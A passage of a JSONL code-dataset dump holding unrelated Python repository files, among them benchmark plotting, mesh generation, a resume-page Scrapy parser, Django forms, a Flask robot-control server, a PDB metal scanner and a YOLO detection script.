0.2894840873)\n\ndef plot_aes_operation(ax1,m1,m2,m3,s1,s2,s3,yaxis=True):\n N = 3\n ind = np.arange(N) # the x locations for the groups\n width = 0.25 # the width of the bars\n buff = width / 3.5\n rects1 = ax1.bar(ind + buff, m1, width,\n color='white', yerr=s1, hatch='..', ecolor='black', edgecolor='dimgray')\n rects2 = ax1.bar(ind + 1.1 * width + buff, m2, width,\n color='silver', yerr=s2, hatch='//', ecolor='black', edgecolor='dimgray')\n rects3 = ax1.bar(ind + 2.2 * width + buff, m3, width,\n color='gray', yerr=s3, hatch='++', ecolor='black', edgecolor='dimgray')\n if (yaxis):\n ax1.set_ylabel('Cycles/Byte')\n ax1.set_xlabel('Security Strength')\n ax1.set_xticks(ind + width * 2)\n ax1.set_ylim([0,3.5])\n ax1.set_xticklabels(('L', 'M', 'H'))\n ax1.yaxis.grid(True)\n\ndef singles_plot_aes():\n plt.close('all')\n f, ax = plt.subplots(1,1, figsize=(5,3))\n plot_aes_operation(ax, cbc_enc_cpb_mean, ctr_cpb_mean, gcm_enc_cpb_mean,\n cbc_enc_cpb_stdev, ctr_cpb_stdev, gcm_enc_cpb_stdev)\n #plot_aes_operation(ax, cbc_dec_cpb_mean, ctr_cpb_mean, gcm_dec_cpb_mean,\n # cbc_dec_cpb_stdev, ctr_cpb_stdev, gcm_dec_cpb_stdev, False)\n plt.show()\n\n\ndef plaot_aes():\n plt.close('all')\n f, (ax1, ax2) = plt.subplots(1,2, sharey = True, figsize=(10,3))\n\n plot_aes_operation(ax1, cbc_enc_cpb_mean, ctr_cpb_mean, gcm_enc_cpb_mean,\n cbc_enc_cpb_stdev, ctr_cpb_stdev, gcm_enc_cpb_stdev)\n plot_aes_operation(ax2, cbc_dec_cpb_mean, ctr_cpb_mean, gcm_dec_cpb_mean,\n cbc_dec_cpb_stdev, ctr_cpb_stdev, gcm_dec_cpb_stdev, False)\n\n plt.legend(labels=[\"CBC\", \"CTR\", \"GCM\"],\n ncol=1, loc=7, bbox_to_anchor=(1.5,0.5))\n\n f.subplots_adjust(bottom=0.25,hspace=0.1)\n #f.subplots_adjust(right=5.25)\n #f.tight_layout()\n plt.show()\n\ndef plot_sha2(m,s):\n N = 3\n ind = np.arange(N) # the x locations for the groups\n width = 0.6 # the width of the bars\n buff = 0.175 #width / 1.5\n fig, ax = plt.subplots(figsize=(3,2.5))\n ax.bar(ind + buff, m, width,\n color='silver', yerr=s, ecolor='black', edgecolor='dimgray')\n\n #ax.set_xticks(ind + width * 2)\n ax.yaxis.grid(True)\n ax.set_ylabel('Cycles/Byte')\n ax.set_xticks(ind + buff + width/2)\n ax.set_xticklabels(('L', 'M', 'H'))\n ax.set_xlabel('Security Strength')\n #ax.legend((rects1[0], rects2[0], rects3[0]), ('SHA-256', 'SHA-384', 'SHA-512'))\n plt.show()\n\n\ndef plot_digi_sig():\n plt.close('all')\n f, (ax1, ax2) = plt.subplots(1,2, sharey = True, figsize=(10,3))\n\n plot_sig_op(ax1, rsa_sign_cpb_mean, ecc_sign_cpb_mean, rsa_sign_cpb_stdev, ecc_sign_cpb_stdev, True)\n plot_sig_op(ax2, rsa_ver_cpb_mean, ecc_ver_cpb_mean, rsa_ver_cpb_stdev, ecc_ver_cpb_stdev, True)\n\n plt.legend(labels=[\"RSA\", \"ECC\"],\n ncol=1, loc=7, bbox_to_anchor=(1.5,0.5))\n\n f.subplots_adjust(bottom=0.25,hspace=0.1)\n #f.subplots_adjust(right=5.25)\n #f.tight_layout()\n plt.show()\n\ndef plot_sig_op(ax,m1,m2,s1,s2,yaxis=True):\n N = 3\n ind = np.arange(N) # the x locations for the groups\n width = 0.25 # the width of the bars\n buff = width / 3.5\n rects1 = ax.bar(ind*0.675 + buff, m1, width,\n color='white', yerr=s1, hatch='..', ecolor='black', edgecolor='dimgray')\n rects2 = ax.bar(ind*0.675 + 1.1 * width + buff, m2, width,\n color='silver', yerr=s2, hatch='//', ecolor='black', edgecolor='dimgray')\n if (yaxis):\n ax.set_ylabel('Million of Cycles')\n ax.set_xticks(ind*0.675 + width*1.5)\n ax.set_ylim([0,10])\n ax.set_xticklabels(('L', 'M', 'H'))\n ax.yaxis.grid(True)\n ax.set_xlabel('Security Strength')\n\n\ndef plot_sig(m1,m2,s1,s2,yaxis=True,sharedY=True):\n N = 2\n ind = np.arange(N) # the x locations for the groups\n width = 0.25 # the width of the bars\n buff = width / 3.5\n\n if sharedY:\n fig, ax = plt.subplots(figsize=(4,3), sharey='row')\n else:\n fig, ax = plt.subplots(figsize=(4,3))\n\n rects1 = ax.bar(ind*0.675 + buff, m1, width,\n color='white', yerr=s1, hatch='..', ecolor='black', edgecolor='dimgray')\n rects2 = ax.bar(ind*0.675 + 1.1 * width + buff, m2, width,\n color='silver', yerr=s2, hatch='//', ecolor='black', edgecolor='dimgray')\n\n # add some text for labels, title and axes ticks\n #ax.set_title('AES Encryption Cycles per Byte (lower the better)')\n if (yaxis):\n ax.set_ylabel('Megacycles/Operation')\n ax.set_xticks(ind*0.675 + width*1.5)\n ax.set_ylim([0,10])\n ax.set_xticklabels(('keys-low', 'keys-medium', 'keys-high'))\n ax.yaxis.grid(True)\n #ax.grid(True)\n #ax.legend((rects1[0], rects2[0]), ('RSA', 'ECDSA'))\n\n return fig\n\ndef singles_plot_digi():\n plt.close('all')\n f, ax = plt.subplots(1,1, figsize=(3.5,3))\n\n #plot_sig_op(ax, rsa_sign_cpb_mean, ecc_sign_cpb_mean, rsa_sign_cpb_stdev, ecc_sign_cpb_stdev, True)\n plot_sig_op(ax, rsa_ver_cpb_mean, ecc_ver_cpb_mean, rsa_ver_cpb_stdev, ecc_ver_cpb_stdev, False)\n\n #f.subplots_adjust(right=5.25)\n #f.tight_layout()\n plt.show()\n\n\ndef main():\n #singles_plot_aes()\n #plot_sha2(sha_cpb_mean, sha_cpb_stdev)\n singles_plot_digi()\n\n\n\n\n\nif __name__==\"__main__\":\n main()\n","repo_name":"stefan-contiu/cloud-crypto-benchmark","sub_path":"macro-bench/micro_plots.py","file_name":"micro_plots.py","file_ext":"py","file_size_in_byte":6617,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"29083001434","text":"from __future__ import print_function\n\nimport os\nimport numpy as np\nimport time\nimport tempfile\n\nimport six\nif six.PY2:\n import cPickle as pickle\nelse:\n import pickle\n\nfrom six.moves.queue import Empty as QueueEmpty\n\nimport petram.debug as debug\ndprint1, dprint2, dprint3 = debug.init_dprints('GeomSequenceOperator')\n\ntest_thread = False\n\nclass MeshSequenceOperator():\n def __init__(self, **kwargs):\n self.mesh_sequence = []\n #self._prev_sequence = []\n\n #def __del__(self):\n # self.terminate_child()\n\n def clean_queue(self, p):\n if self.use_mp:\n p.task_q.close()\n p.q.close()\n p.task_q.cancel_join_thread()\n p.q.cancel_join_thread()\n\n def terminate_child(self, p):\n if p.is_alive():\n if self.use_mp:\n self.clean_queue(p) \n p.terminate()\n else:\n p.task_q.put((-1, None))\n p.task_q.join()\n\n def add(self, name, *gids, **kwargs):\n '''\n add mesh command\n '''\n\n if name == 'extrude_face':\n self.mesh_sequence.append(['copyface', (gids[1], gids[2]), kwargs])\n elif name == 'revolve_face':\n\n kwargs['revolve'] = True\n kwargs['volume_hint'] = gids[0]\n self.mesh_sequence.append(['copyface', (gids[1], gids[2]), kwargs])\n else:\n pass\n self.mesh_sequence.append([name, gids, kwargs])\n \n def count_sequence(self):\n return len(self.mesh_sequence)\n \n def clear(self):\n self.mesh_sequence = []\n \n \n def run_generater(self, brep_input, msh_file, kwargs,\n finalize=False, dim=3, progressbar=None):\n\n ''' \n kwargs = {'CharacteristicLengthMax': self.clmax,\n 'CharacteristicLengthMin': self.clmin,\n 'EdgeResolution': self.res,\n 'MeshAlgorithm': self.algorithm,\n 'MeshAlgorithm3D': self.algorithm3d,\n 'MeshAlgorithmR': self.algorithmr,\n 'MaxThreads': self.maxthreads,\n 'use_profiler': self.use_profiler,\n 'use_expert_mode': self.use_expert_mode,\n 'gen_all_phys_entity': self.gen_all_phys_entity,\n 'trash': self.trash,\n 'edge_tss': edge_tss}\n '''\n from petram.mesh.gmsh_mesh_wrapper import (GMSHMeshGenerator,\n GMSHMeshGeneratorTH)\n\n if progressbar is None or globals()['test_thread']:\n self.use_mp = False\n p = GMSHMeshGeneratorTH()\n else:\n self.use_mp = True\n p = GMSHMeshGenerator()\n p.start()\n\n args=(brep_input, msh_file, self.mesh_sequence, dim,\n finalize, kwargs)\n\n p.task_q.put((1, args))\n\n istep = 0\n\n while True:\n try:\n ret = p.q.get(True, 1)\n if ret[0]:\n break\n if progressbar is not None:\n istep += 1\n progressbar.Update(istep, newmsg=ret[1])\n else:\n print(\"Mesh Generator : Step = \" +\n str(istep) + \" : \" + ret[1])\n\n except QueueEmpty:\n if not p.is_alive():\n if progressbar is not None:\n progressbar.Destroy()\n p.q.close()\n p.q.cancel_join_thread()\n assert False, \"Child Process Died\"\n break\n time.sleep(1.)\n if progressbar is not None:\n import wx\n wx.Yield()\n if progressbar.WasCancelled():\n self.terminate_child(p)\n progressbar.Destroy()\n assert False, \"Mesh Generation Aborted\"\n\n time.sleep(0.01)\n\n self.terminate_child(p)\n\n try:\n max_dim, done, msh_output = ret[1]\n assert msh_output is not None, \"failed to generate mesh\"\n from petram.geom.read_gmsh import read_pts_groups, read_loops\n\n if progressbar is not None:\n progressbar.Update(istep, newmsg=\"Reading mesh file for rendering\")\n else:\n print(\"Reading mesh file for rendering\")\n\n import gmsh \n gmsh.open(msh_output)\n\n ptx, cells, cell_data = read_pts_groups(gmsh,\n finished_lines=done[1],\n finished_faces=done[2])\n\n data = ptx, cells, {}, cell_data, {}\n \n except:\n if progressbar is not None:\n progressbar.Destroy()\n raise\n \n if progressbar is not None:\n progressbar.Destroy()\n\n return max_dim, done, data, msh_output\n","repo_name":"piScope/PetraM_Geom","sub_path":"petram/mesh/mesh_sequence_operator.py","file_name":"mesh_sequence_operator.py","file_ext":"py","file_size_in_byte":5042,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"70813437681","text":"def summing(first, digit, last):\r\n if first.isupper():\r\n digit /= ord(first) - 64\r\n elif first.islower():\r\n digit *= ord(first) - 96\r\n if last.isupper():\r\n digit -= ord(last) - 64\r\n elif last.islower():\r\n digit += ord(last) - 96\r\n return digit\r\n\r\n\r\ndef things(text):\r\n total = 0\r\n for word in text:\r\n word = word.strip()\r\n first_letter = word[0]\r\n last_letter = word[-1]\r\n digit = int(word[1:-1])\r\n total += summing(first_letter, digit, last_letter)\r\n return total\r\n\r\n\r\ntext = input().split()\r\nprint(f\"{things(text):.2f}\")\r\n","repo_name":"kokolino1015/Softuni-Python","sub_path":"fund/Text Processing/Ex.L8.08.py","file_name":"Ex.L8.08.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"2284156340","text":"#!/usr/bin/python3\n'''A student will not be allowed to sit in exam if his/her attendance is less than 75% and allow\nstudent to sit if he/she has medical cause upto 65%. Ask user if he/she has medical cause or\nnot ( 'Y' or 'N' ) and print accordingly.'''\n\n\nprint(\"Total_Working_Days = 100\")\n\nDays = int(input(\"Days You Came: \"))\n\nPerc = int((Days/100)*100)\nmed = []\nprint(Perc)\nif Perc>=75:\n\tprint(\"you alowed to write a exam\")\nif Perc<=74:\n \tmed = input(\"Do you have Medical Cert? yes/no: \")\nif med == ('yes'):\n\tif Perc>=65:\n\t\tprint('go and write Exam')\n\telse:\n\t\tprint(\"your att Perc is below 65 so you don't allow to write an exam\")\nelif med==('no'):\n\tprint(\"You not allowed to write a exam :(\")","repo_name":"0xsakthi/Python-Problems-For-Begginers","sub_path":"Branching/attenedence.py","file_name":"attenedence.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"12925839308","text":"import scrapy\r\nimport pandas as pd\r\n\r\nclass Sandhi(scrapy.Spider):\r\n name = \"sandhi\"\r\n start_urls = [\"file:///Users/prathameshmadur/Downloads/JS/sandhi.html\"]\r\n\r\n def parse(self, response):\r\n\r\n counter = 0\r\n data = []\r\n columns=['SerialNo', 'currentCompany', 'currentLocation', 'designation', 'downloadLink', 'downloadName', 'experience', 'name',\r\n 'preferedLocation', 'prevComapny', 'prevDesignation', 'qualification', 'resumeViewed', 'salary', 'skills']\r\n\r\n for responseList in response.css('.rs_list'):\r\n counter += 1\r\n name = responseList.css('.rs_2 > .black > a::text').extract_first()\r\n designation = responseList.css('.rs_2 > .mt10::text').extract_first().replace(\"\\xa0\", \"\")\r\n company = responseList.css('.rs_2 > .mt2::text').extract()[0].replace(\"\\xa0\", \"\")\r\n prevDesignation = responseList.css('.rs_2 > .mt2::text').extract()[1].replace(\"\\xa0\", \"\")\r\n prevComapny = responseList.css('.rs_2 > .mt2::text').extract()[2].replace(\"\\xa0\", \"\")\r\n skills = responseList.css('.rs_2 > .mt15::text').extract_first().replace(\"\\xa0\", \"\").replace(\"\\r\", \"\").replace(\"\\n\", \"\")\r\n experience = responseList.css('.rs_3 > p::text').extract()[0].replace(\"\\xa0\", \"\").replace(\"\\r\", \"\").replace(\"\\n\", \"\").replace(\"|\", \"\")\r\n salary = responseList.css('.rs_3 > p::text').extract()[1].replace(\"\\xa0\", \"\").replace(\"\\r\", \"\").replace(\"\\n\", \"\").replace(\"|\", \"\")\r\n qualification = responseList.css('.rs_3 > .mt2::text').extract()[0].replace(\"\\xa0\", \"\").replace(\"\\r\", \"\").replace(\"\\n\", \"\")\r\n currentLocation = responseList.css('.rs_3 > .mt2::text').extract()[1].replace(\"\\xa0\", \"\").replace(\"\\r\", \"\").replace(\"\\n\", \"\")\r\n preferedLocation = responseList.css('.rs_3 > .mt2::text').extract()[2].replace(\"\\xa0\", \"\").replace(\"\\r\", \"\").replace(\"\\n\", \"\")\r\n resumeViewed = responseList.css('.rs_3 > .mt15 > b::text').extract()[1]\r\n downloadLink = responseList.css('.rs_3 > .mt10 > a::attr(href)').extract_first()\r\n downloadName = downloadLink.replace(\"https://www.jobsandhi.com/members/downloadresume/\", \"\")\r\n\r\n item = { \"name\": name,\r\n \"designation\": designation,\r\n \"currentCompany\": company,\r\n \"prevDesignation\": prevDesignation,\r\n \"prevComapny\": prevComapny,\r\n \"skills\": skills,\r\n \"experience\": experience,\r\n \"salary\": salary,\r\n \"qualification\": qualification,\r\n \"currentLocation\": currentLocation,\r\n \"preferedLocation\": preferedLocation,\r\n \"resumeViewed\": resumeViewed,\r\n \"downloadLink\": downloadLink,\r\n \"downloadName\": downloadName,\r\n \"Serialno\": counter}\r\n\r\n data.append(item)\r\n\r\n df = pd.DataFrame(data)\r\n df.columns = columns\r\n df.to_csv('resumes.csv')\r\n #df.to_csv('resumes.csv', mode='a', header=False)\r\n","repo_name":"iamprathamesh/Jobsandhi-crawler","sub_path":"JobsandhiCrawler.py","file_name":"JobsandhiCrawler.py","file_ext":"py","file_size_in_byte":2775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"8392024464","text":"\"\"\"urlconf for the base application\"\"\"\n\nfrom django.conf.urls import url\n\nfrom . import views\n\n\nurlpatterns = [\n url(r'^$', views.home, name='home'),\n url(r'^login$', views.login_user, name='login_user'),\n url(r'^logout$', views.logout_user, name='logout_user'),\n url(r'^registration$', views.registration_user, name='registration_user'),\n url(r'^upload_images$', views.upload_images, name='update_images'),\n url(r'^search_by_image$', views.search_by_image, name='search_by_image'),\n url(r'^search$', views.search, name='search'),\n url(r'^click_like$', views.click_like, name='click_like'),\n\turl(r'^prepare_images$', views.prepare_images, name='prepare_images'),\n]\n","repo_name":"CodingYue/Fudan-software-engineering-development","sub_path":"web/apps/base/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"71580408881","text":"from django.forms import ModelForm, DateInput\nfrom django.utils import timezone\nfrom cal.models import Event\n\n\nclass EventForm(ModelForm):\n class Meta:\n model = Event\n # datetime-local is a HTML5 input type, format to make date time show on fields\n widgets = {\n 'start_time': DateInput(attrs={'type': 'datetime-local'}, format='%Y-%m-%dT%H:%M'),\n 'end_time': DateInput(attrs={'type': 'datetime-local'}, format='%Y-%m-%dT%H:%M'),\n }\n fields = ['host', 'zoom_link', 'start_time', 'end_time']\n\n def __init__(self, *args, **kwargs):\n super(EventForm, self).__init__(*args, **kwargs)\n # input_formats parses HTML5 datetime-local input to datetime field\n self.fields['start_time'].input_formats = ('%Y-%m-%dT%H:%M',)\n self.fields['end_time'].input_formats = ('%Y-%m-%dT%H:%M',)\n self.fields['host'].disabled = (True)\n\n def clean(self):\n super(EventForm, self).clean()\n\n start_time = self.cleaned_data.get('start_time')\n end_time = self.cleaned_data.get('end_time')\n\n if (start_time > end_time):\n self._errors['start_time'] = self.error_class(\n ['Start time cannot be later than end time!'])\n if (start_time <= timezone.now()):\n self._errors['start_time'] = self.error_class(\n ['Start time cannot be earlier than current time!'])\n if (end_time <= timezone.now()):\n self._errors['end_time'] = self.error_class(\n ['End time cannot be earlier than current time!'])\n\n return self.cleaned_data\n","repo_name":"Asuka-neko/MeetCIT","sub_path":"MeetCIT/cal/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1610,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"20905000618","text":"from pathlib import Path\nimport numpy as np\nimport torch\nfrom torch_geometric.loader import DataLoader\nfrom ..ood_dataset import HEP_Pileup_Shift, HEP_Signal_Shift, QMOF, Drug3d\nfrom ..utils import utils\n\n\ndef get_data_loaders(dataset_name, config, shift_config, seed):\n root_dir = (Path(config['dir_config']['dataset_dir']) / f'{dataset_name}').as_posix()\n batch_size = config['optimizer']['batch_size']\n data_config = config['data']\n shift_name = shift_config['shift_name']\n setting = data_config['setting']\n if dataset_name == 'Track':\n assert shift_name in [\"pileup\", \"signal\"]\n Dataset = HEP_Pileup_Shift if shift_name == 'pileup' else HEP_Signal_Shift\n elif dataset_name == 'QMOF':\n assert shift_name == 'fidelity'\n Dataset = QMOF\n elif dataset_name == 'DrugOOD-3D':\n assert shift_name in [\"size\", \"scaffold\", \"assay\"]\n Dataset = Drug3d\n else:\n raise NotImplementedError\n dataset = Dataset(root_dir, data_config, shift_config, seed)\n\n def process(dataset):\n if dataset.dataset_name == \"DrugOOD-3D\":\n dataset.data.y = dataset.data.y.view(-1, 1)\n dataset.data.x[dataset.data.x == -1] = 13\n if dataset.dataset_name == \"QMOF\":\n dataset.data.y = dataset.data.y.view(-1, 1)\n return dataset\n\n dataset = process(dataset) # necessary for DrugOOD-3D\n loaders = get_ood_data_loader(batch_size, dataset=dataset, idx_split=dataset.idx_split, setting=setting)\n\n if data_config['setting'] == \"O-Feature\":\n loaders['train_source'] = utils.ForeverDataIterator(loaders['train_source'])\n loaders['train_target'] = utils.ForeverDataIterator(loaders['train_target'])\n return loaders, dataset\n\n\ndef get_ood_data_loader(batch_size, dataset, idx_split, setting):\n data_loader = dict()\n for item in idx_split.keys():\n shuffling = True if item.split('_')[0] == 'train' else False\n drop_last = True if (item.split('_')[0] == 'train' and setting == \"O-Feature\") else False\n batch_size = 32 if item in ['ood_val', 'ood_test'] and dataset.dataset_name == 'Track' else batch_size\n loader = DataLoader(dataset[idx_split[item]], batch_size=batch_size, shuffle=shuffling, follow_batch=None,\n drop_last=drop_last)\n data_loader[item] = loader\n return data_loader\n","repo_name":"Graph-COM/GDL_DS","sub_path":"src/utils/get_data_loaders.py","file_name":"get_data_loaders.py","file_ext":"py","file_size_in_byte":2367,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"75"} +{"seq_id":"38383469455","text":"from flask import Flask\nfrom flask import request\nimport time\nimport test_client as tc\napp = Flask(__name__)\n\n# the queue holds multiple orders\nqueue = []\n\n# a queue structure holding the next instructions for the robot\ncommands = []\n\n# get commands from file and load into commands\ndef get_commands(n):\n f = open('commands')\n lines = f.readlines()\n f.close()\n\n line = lines[n]\n data = line.split(',')\n commands = data \n \n# send a message to the robot depending on the command\ndef move_robot(c):\n if c == 'f':\n tc.send_message('follow_line_until_intersection')\n if c == 'r':\n tc.send_message('turn_right')\n if c == 'l':\n tc.send_message('turn_left')\n if c == 't':\n tc.send_message('turn_around')\n\n# :)\n@app.route('/')\ndef hello_world():\n return 'This is group 13\\'s web server for the their robot, no touchy touchy'\n\n\n# Endpoint for the connection from the app\n@app.route('/APP/', methods=['POST'])\ndef APP():\n data = request.form.get('seat')\n\n # verify data is of type int\n try:\n data = int(data)\n except:\n data = 0\n\n # don't give invalid seat values\n data = data % 6\n\n # verify data is not Nonetype (already check but just to be safe)\n if data is not None:\n\n # add seat to queue\n queue.append(data)\n\n # if there are no commands in the command queue get the next set of commands\n if len(commands) == 0:\n get_commands(data)\n return \"success!\"\n return \"failure!\"\n\n# Endpoint for connections from the EV3\n@app.route('/EV3/', methods=['POST'])# finishes an action\ndef EV3():\n # Check the command queue is non-empty\n if len(commands) > 0:\n move_robot(command[0])\n commands.pop(0)\n else:\n # when debugging stops crash if queue is empty\n try:\n queue.pop(0)\n if len(queue) > 0:\n get_commands(queue[0])\n except:\n return \"failure\"\n \n return \"received\"\n\n# run the flask app\nif __name__ == '__main__':\n app.run('0.0.0.0', port=80)\n","repo_name":"sdpteam13/BarBender","sub_path":"RASPI/main_server.py","file_name":"main_server.py","file_ext":"py","file_size_in_byte":2002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"71087912561","text":"from __future__ import print_function\nimport multiprocessing as mp\nimport glob\nimport mdtraj as md\n\npdbpath = '/cbio/jclab/share/pdb/*/*.ent.gz'\nppn = 32\nmetal_name = 'ZN'\n\ndef metal_scanner(file):\n \n contains_metal = [False, file]\n try:\n traj = md.load_pdb(file)\n except:\n return [None, file] \n \n if [atom for atom in traj.top.atoms if atom.name == 'ZN' and atom.residue.name == 'ZN']:\n contains_metal[0] = True\n \n print(contains_metal) \n return contains_metal\n \ndef database_analyzer(pdbpath):\n \n database_analyzer_results = [0, []]\n #files_wo_metal = 0\n \n for contains_metal in pool.map(metal_scanner, glob.iglob(pdbpath)):\n if contains_metal[0] == True:\n database_analyzer_results[0] += 1\n database_analyzer_results[1].append(contains_metal[1])\n # elif contains_metal == False:\n # files_wo_metal += 1 \n \n return database_analyzer_results \n \n# Multiprocess set-up\nif __name__ == '__main__':\n \n pool = mp.Pool(processes = ppn)\n database_analyzer_results = database_analyzer(pdbpath) \n \n \n# write results\nwith open('metal_scanner_by_mdtraj_results_FILES.txt', 'w') as f:\n #f.write('All files analyzed:\\n') \n #f.write(str(files_w_metal + files_wo_metal))\n #f.write('\\n')\n #f.write('All files in the database:\\n')\n #f.write(str(len(glob.glob(pdbpath))))\n #f.write('\\n')\n f.write('Files containing %s: \\n' % metal_name)\n f.write(str(database_analyzer_results[0]))\n f.write('\\n')\n f.write('File paths:\\n')\n for line in database_analyzer_results[1]:\n f.write(str(line))\n f.write('\\n')\n \n \n","repo_name":"choderalab/PDBAnalyzer","sub_path":"metal_scanner/by_mdtraj/metal_scanner_by_mdtraj_files.py","file_name":"metal_scanner_by_mdtraj_files.py","file_ext":"py","file_size_in_byte":1748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"31003284909","text":"from time import sleep\nfrom threading import Thread\nimport client, middleware, server\n\nhost = \"127.0.0.1\"\nserverPort = 8000\nclientPort = 8001\nchunkSize = 2048\n\nserver = Thread(target = server.run, args=(host, serverPort, chunkSize,))\nmiddleware = Thread(target = middleware.run, args=(host, clientPort, serverPort, chunkSize,))\nclient = Thread(target = client.run, args=(host, clientPort, chunkSize,))\n\nserver.start()\nsleep(1)\nmiddleware.start()\nsleep(1)\nclient.start()\n","repo_name":"KruglovDmitry/DistributedApplications","sub_path":"Lab_1/Lab_1/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"32712072360","text":"#! /usr/bin/env python\n\"\"\"Run a YOLO_v2 style detection model on test images.\"\"\"\nimport argparse\nimport colorsys\nimport imghdr\nimport os\nimport random\n\nimport numpy as np\nfrom keras import backend as K\nfrom keras.models import load_model\nfrom PIL import Image, ImageDraw, ImageFont\nfrom models.YAD2K.yad2k.models.keras_yolo import yolo_eval, yolo_head\n\nimport cv2\n\ndef yolo_detect(image_url):\n model_path = 'models/YAD2K/model_data/yolo.h5'\n anchors_path = 'models/YAD2K/model_data/yolo_anchors.txt'\n classes_path = 'models/YAD2K/model_data/coco_classes.txt'\n score_threshold = 0.3\n iou_threshold = 0.5\n\n sess = K.get_session()\n\n with open(classes_path) as f:\n class_names = f.readlines()\n class_names = [c.strip() for c in class_names]\n\n with open(anchors_path) as f:\n anchors = f.readline()\n anchors = [float(x) for x in anchors.split(',')]\n anchors = np.array(anchors).reshape(-1, 2)\n\n yolo_model = load_model(model_path)\n\n # Verify model, anchors, and classes are compatible\n num_classes = len(class_names)\n num_anchors = len(anchors)\n\n # Check if model is fully convolutional, assuming channel last order.\n model_image_size = yolo_model.layers[0].input_shape[1:3]\n is_fixed_size = model_image_size != (None, None)\n\n # Generate colors for drawing bounding boxes.\n hsv_tuples = [(x / len(class_names), 1., 1.)\n for x in range(len(class_names))]\n colors = list(map(lambda x: colorsys.hsv_to_rgb(*x), hsv_tuples))\n colors = list(\n map(lambda x: (int(x[0] * 255), int(x[1] * 255), int(x[2] * 255)),\n colors))\n random.seed(10101) # Fixed seed for consistent colors across runs.\n random.shuffle(colors) # Shuffle colors to decorrelate adjacent classes.\n random.seed(None) # Reset seed to default.\n\n # Generate output tensor targets for filtered bounding boxes.\n yolo_outputs = yolo_head(yolo_model.output, anchors, len(class_names))\n\n input_image_shape = K.placeholder(shape=(2, ))\n boxes, scores, classes = yolo_eval(\n yolo_outputs,\n input_image_shape,\n score_threshold = score_threshold,\n iou_threshold = iou_threshold)\n\n\n pre_image = cv2.imread(\".\" + image_url)\n pre_image = cv2.cvtColor(pre_image, cv2.COLOR_BGR2RGB)\n src_image_pil=Image.fromarray(pre_image)\n pil_normalize = src_image_pil.convert('RGB')\n image = pil_normalize\n\n if is_fixed_size: # TODO: When resizing we can use minibatch input.\n resized_image = image.resize(\n tuple(reversed(model_image_size)), Image.BICUBIC)\n image_data = np.array(resized_image, dtype='float32')\n else:\n # Due to skip connection + max pooling in YOLO_v2, inputs must have\n # width and height as multiples of 32.\n new_image_size = (image.width - (image.width % 32),\n image.height - (image.height % 32))\n resized_image = image.resize(new_image_size, Image.BICUBIC)\n image_data = np.array(resized_image, dtype='float32')\n #print(image_data.shape)\n\n image_data /= 255.\n image_data = np.expand_dims(image_data, 0) # Add batch dimension.\n\n out_boxes, out_scores, out_classes = sess.run(\n [boxes, scores, classes],\n feed_dict={\n yolo_model.input: image_data,\n input_image_shape: [image.size[1], image.size[0]],\n K.learning_phase(): 0\n })\n\n font = ImageFont.truetype(\n font='models/YAD2K/font/FiraMono-Medium.otf',\n size=np.floor(3e-2 * image.size[1] + 0.5).astype('int32'))\n thickness = (image.size[0] + image.size[1]) // 300\n\n for i, c in reversed(list(enumerate(out_classes))):\n #print(i, \"2\")\n predicted_class = class_names[c]\n box = out_boxes[i]\n score = out_scores[i]\n\n label = '{} {:.2f}'.format(predicted_class, score)\n\n draw = ImageDraw.Draw(image)\n label_size = draw.textsize(label, font)\n\n top, left, bottom, right = box\n top = max(0, np.floor(top + 0.5).astype('int32'))\n left = max(0, np.floor(left + 0.5).astype('int32'))\n bottom = min(image.size[1], np.floor(bottom + 0.5).astype('int32'))\n right = min(image.size[0], np.floor(right + 0.5).astype('int32'))\n #print(label, (left, top), (right, bottom))\n\n if top - label_size[1] >= 0:\n text_origin = np.array([left, top - label_size[1]])\n else:\n text_origin = np.array([left, top + 1])\n\n # My kingdom for a good redistributable image drawing library.\n\n for i in range(thickness):\n draw.rectangle(\n [left + i, top + i, right - i, bottom - i],\n outline=colors[c])\n draw.rectangle(\n [tuple(text_origin), tuple(text_origin + label_size)],\n fill=colors[c])\n draw.text(text_origin, label, fill=(0, 0, 0), font=font)\n del draw\n\n yolo_url= \".\" + image_url.rsplit('.', 1)[0] + \"_yolo.\" + image_url.rsplit('.', 1)[1]\n #print(yolo_url)\n image.save(yolo_url)\n #sess.close()\n return yolo_url\n","repo_name":"MitsuhiroIto/Flask_AI","sub_path":"models/yolo_detection.py","file_name":"yolo_detection.py","file_ext":"py","file_size_in_byte":5091,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"75"} +{"seq_id":"18501442584","text":"config = {\n # 标签 -> 物体名\n 'label_2_name' : {\n 0: '无垃圾',\n 1: '烟头',\n 2: '砖头',\n 3: '瓶子',\n 4: '土豆',\n 5: '香蕉',\n 6: '娃娃菜',\n 7: '陶瓷',\n 8: '电池',\n 9: '苹果',\n 10:'易拉罐'\n },\n\n # 各类垃圾标签\n 'label_list': {\n 'none':[0],\n 'harmful':[8],\n 'recycle': [6,10],\n 'kitchen': [3,4,5,9],\n 'others': [1,2,7],\n },\n\n 'video_path':'./video/demo.mp4', # 宣传视频路径\n 'usart': '/dev/ttyTHS1', # 串口名称\n 'model_path': './model/resnet18_fine_tune_49.pth', # 